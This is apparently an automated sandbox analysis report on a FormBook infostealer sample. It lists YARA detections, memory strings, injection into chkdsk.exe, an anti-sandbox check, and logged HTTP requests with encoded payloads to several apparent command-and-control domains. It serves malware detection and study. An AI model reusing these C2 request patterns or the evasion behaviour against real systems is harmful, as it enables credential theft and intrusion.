          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.bodiscdn.com
          Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: unknownDNS traffic detected: queries for: www.experiencedlawfirms.com
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1Host: www.experiencedlawfirms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1Host: www.totalwinerewards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1Host: www.casatowerofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1Host: www.bitconga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1Host: www.omnipets.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: GV8EJooYMIgEnEk.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0275E6D8
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0275C294
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0275E6C8
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_07160234
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_071692D0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0716003F
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_07160040
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B8C3
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041C0CD
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041C8EE
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041C8F8
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00408C7F
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041C435
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00408C80
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041CF03
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00402FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4D466
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9841F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E525DD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581
